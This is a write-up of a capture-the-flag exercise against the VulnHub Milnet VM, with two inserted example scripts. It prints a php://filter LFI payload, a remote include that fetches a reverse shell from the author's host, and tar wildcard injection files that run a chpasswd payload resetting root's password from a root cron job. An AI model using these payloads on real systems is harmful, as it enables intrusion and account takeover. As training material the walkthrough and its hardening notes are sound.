Milnet 1 Solution

Hi Again,

Today I will show you how to pwn the Milnet VM from VulnHub.

Fire up the machine and run your port scans; only ports 22 and 80 are open:

Starting Nmap 6.40 ( http://nmap.org ) at 2016-10-29 17:08 EET
Nmap scan report for 192.168.1.12
Host is up (0.00019s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     (protocol 2.0)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open  http    lighttpd 1.4.35
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.40%I=7%D=10/29%Time=5814BB75%P=x86_64-pc-linux-gnu%r(NUL
SF:L,20,"SSH-2\.0-OpenSSH_7\.2p2\x20Ubuntu-4\r\n");
MAC Address: F4:06:69:8D:72:D7 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=6.40%E=4%D=10/29%OT=22%CT=1%CU=36331%PV=Y%DS=1%DC=D%G=Y%M=F40669%
OS:TM=5814BB83%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10C%TI=Z%CI=I%TS=
OS:8)SEQ(SP=107%GCD=1%ISR=10C%TI=Z%II=I%TS=8)OPS(O1=M5B4ST11NW7%O2=M5B4ST11
OS:NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=712
OS:0%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M5B
OS:4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(
OS:R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F
OS:=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T
OS:=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RI
OS:D=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.19 ms 192.168.1.12

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.47 seconds

I had a look at the web page on port 80.

Page.png

I fired up Burp and found this:

Burp1.png

There is a POST parameter called route.

I suspected an LFI vulnerability and I was right: I used the php://filter trick (route=php://filter/convert.base64-encode/resource=FILE, then base64-decode the response) to pull back the source code instead of having PHP execute it.

Burp2.png

I got the source code of all the files but unfortunately found no lead in it. I also pulled the phpinfo page the same way and found that allow_url_include is On.

Great: with that setting the LFI becomes an RFI, because include() will fetch an http:// URL. I set up a reverse shell on my server (served as a plain file by a web server that does not execute PHP, so the target fetches the raw source) and sent a POST request with the parameter route=http://192.168.1.8:8000/shell.php

and I got myself a shell.

shell.png
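The php://filter trick spelled out, as an added example that is not part of the original post. It assumes the include()d value is the POST parameter route on the target's index.php (both seen in Burp above); the TARGET URL and the sample response are placeholders constructed for the example, and the curl helper is shown but not exercised offline.

```shell
#!/bin/sh
# Added example (not from the original post): the php://filter trick used
# above, written out so it can be reproduced. TARGET and SAMPLE_PHP are
# placeholders constructed for this example.

TARGET="http://192.168.1.12/index.php"             # assumed URL of the vulnerable page
SAMPLE_PHP="<?php include(\$_POST['route']); ?>"  # constructed stand-in for index.php

# The route value: PHP resolves the wrapper, base64-encodes the file and then
# includes harmless base64 text instead of executing the PHP inside the file.
php_filter_payload() {
    printf 'php://filter/convert.base64-encode/resource=%s' "$1"
}

# Send it as the POST parameter the page include()s. Usage: lfi_fetch_source URL FILE
# (network call; not run in the offline check).
lfi_fetch_source() {
    curl -s -X POST --data-urlencode "route=$(php_filter_payload "$2")" "$1"
}

# Pull the first long base64 run out of the response body on stdin and decode it.
# If the page HTML itself contains long alphanumeric runs, tighten the pattern.
decode_lfi_response() {
    grep -oE '[A-Za-z0-9+/=]{16,}' | head -n 1 | base64 -d
}

# Constructed response: what the page would wrap around the encoded file.
sample_response() {
    printf '<html><body>%s</body></html>' "$(printf '%s' "$SAMPLE_PHP" | base64 | tr -d '\n')"
}

# Stand-alone run against the constructed response. Against the real box:
#   lfi_fetch_source "$TARGET" index.php | decode_lfi_response
sample_response | decode_lfi_response
echo
```

php://filter is a local wrapper, so reading source this way works even with allow_url_include=Off; only the later http:// include needs it On. Requesting the file without the filter makes PHP execute it, so you would see its output rather than its code.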

Looking for a (fast) escalation point: my shell landed in the / directory, and running ls there I found a folder called backup.

Inside it I found a backup.sh file, owned by root, which contains a wildcard misconfiguration. Of course I can't run this file with my privileges, so I searched for someone or something that calls this script.

So I looked for backup.sh in all files on the system (run from /, so the paths below are relative to /; add 2>/dev/null to hide the permission-denied noise):

grep -r "backup.sh" > /tmp/result
below is output
$ cat /tmp/result
var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_xenial_universe_i18n_Translation-en: This package provides the backup, restore, backup.sh, and dump-remind
home/langman/SDINET/fips_500_166.txt:system data.   Each backup should be  checked to ensure  that the 
etc/crontab:*/1 *     * * *     root    /backup/backup.sh
usr/sbin/deluser:    # if --backup-to is specified, --backup should be set too
$

That shows the file is called from /etc/crontab, as root, every minute. Great, easy root shell now.

The content of the backup script is:

#!/bin/bash
cd /var/www/html
tar cf /backup/backup.tgz *

The wildcard is the misconfiguration: the shell expands the unquoted * into the names of every file in /var/www/html before tar ever sees them, so a file whose name looks like an option is parsed by GNU tar as an option. tar accepts --checkpoint=N and --checkpoint-action=exec=COMMAND, which runs an arbitrary command from inside the backup job, and that job runs as root. Since our web shell can write to /var/www/html, we can create files with exactly those names and inject Linux commands.

I created a file called myshell.sh in /var/www/html with this content:

echo "root:password1" | chpasswd

When root's cron job runs it, this sets root's password to password1.

Next I created, in the same /var/www/html directory, two empty files whose names are the tar options that inject the command. The -- is needed so touch does not treat the names as its own options, and the quotes keep the space in the first name:

touch -- '--checkpoint-action=exec=sh myshell.sh'
touch -- '--checkpoint=1'

The script does cd /var/www/html before calling tar, so the exec action's sh myshell.sh resolves to the file we just wrote.
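To see the injection happen without waiting for cron or touching root, here is an added example (mine, not code from the Milnet box): it rebuilds the situation in a scratch directory, runs the same `tar cf ... *` line as backup.sh, and then runs a hardened variant. The html directory, the marker file and all paths are stand-ins; the real chpasswd payload line from above is kept in a comment. It needs GNU tar, which is what the box runs.

```shell
#!/bin/sh
# Added example (not from the Milnet writeup): reproduce the tar wildcard
# injection in a scratch directory so the mechanism can be observed safely.
# "html" stands in for /var/www/html and "marker" for the chpasswd side effect;
# no cron, no root, no real password change.

# Lay out the directory the way the attacker leaves /var/www/html.
setup_target_dir() {
    work=$1
    mkdir -p "$work/html"
    # Payload executed by tar; the real writeup used: echo "root:password1" | chpasswd
    printf 'touch "%s/marker"\n' "$work" > "$work/html/myshell.sh"
    # File names that the shell glob will hand to tar as if they were options.
    # "--" stops touch itself from parsing them as options.
    touch -- "$work/html/--checkpoint=1"
    touch -- "$work/html/--checkpoint-action=exec=sh myshell.sh"
}

# Vulnerable form, exactly as /backup/backup.sh does it: unquoted * after cf.
# Prints "injected" if the payload ran, "clean" otherwise.
run_vulnerable_backup() {
    work=$(mktemp -d) || return 1
    setup_target_dir "$work"
    ( cd "$work/html" && tar cf "$work/backup.tgz" * ) 2>/dev/null || true
    if [ -e "$work/marker" ]; then echo injected; else echo clean; fi
    rm -rf "$work"
}

# Hardened form: anchor the glob with ./ so every expanded name begins with
# "./" and cannot be parsed as an option (passing "--" before * also works).
run_hardened_backup() {
    work=$(mktemp -d) || return 1
    setup_target_dir "$work"
    ( cd "$work/html" && tar cf "$work/backup.tgz" ./* ) 2>/dev/null || true
    if [ -e "$work/marker" ]; then echo injected; else echo clean; fi
    rm -rf "$work"
}

# Stand-alone run: show both results side by side.
echo "vulnerable: $(run_vulnerable_backup)"
echo "hardened:   $(run_hardened_backup)"
```

The fix is not to quote the star (that would archive a file literally named *) but to stop the expanded names from being option-shaped: `./*`, `--` before the glob, or `tar cf /backup/backup.tgz -C /var/www/html .`. The underlying lesson is that a root cron job archiving a directory the web user can write to is a privilege boundary, whatever the tar invocation looks like.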

Next I ran hydra in a loop against the machine until the cron job fired and the password changed (it runs every minute, so this takes at most about 60 seconds; a plain sleep 60 followed by ssh root@192.168.1.12 would do the same job):

sakr@HacKeD ~/study/Milnet $ for i in {1..200}; do hydra -l root -p password1 192.168.1.12 ssh; done
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2016-10-29 21:52:50
[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.12   login: root   password: password1
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-10-29 21:52:51
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2016-10-29 21:52:51
[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.12   login: root   password: password1
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-10-29 21:52:51

That was a fairly easy VM. Hope you enjoyed it.
